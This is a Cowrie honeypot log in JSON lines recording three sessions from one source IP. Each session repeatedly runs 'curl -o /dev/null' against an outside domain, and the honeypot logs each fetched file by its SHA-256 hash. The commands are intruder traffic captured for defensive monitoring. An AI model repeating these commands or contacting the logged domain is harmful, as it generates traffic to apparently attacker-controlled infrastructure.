{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.520576Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.525220Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.527880Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.531606Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.532229Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.533632Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.534517Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.561386Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.562981Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.563623Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.569062Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.571238Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.589794Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.592444Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.595959Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.596683Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.601868Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.602748Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.604451Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.605483Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.641740Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.642626Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.645182Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.645852Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.647236Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.647849Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.650727Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.653069Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.688211Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.689092Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.695442Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.697634Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.700641Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.701982Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.702902Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.724778Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.725681Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.728295Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.729017Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.732336Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.734362Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.740583Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.745048Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.745489Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.770349Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.771259Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.773370Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.774093Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.779523Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.781768Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.810091Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.811801Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.814570Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.815930Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.816557Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.822796Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.823368Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.827196Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.827986Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.877127Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.877887Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.880643Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.881439Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.883987Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.884579Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.886995Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.889614Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.915813Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.916488Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.921191Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.922276Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.924299Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.926498Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.929369Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.930403Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.931026Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.958251Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.958934Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.962319Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
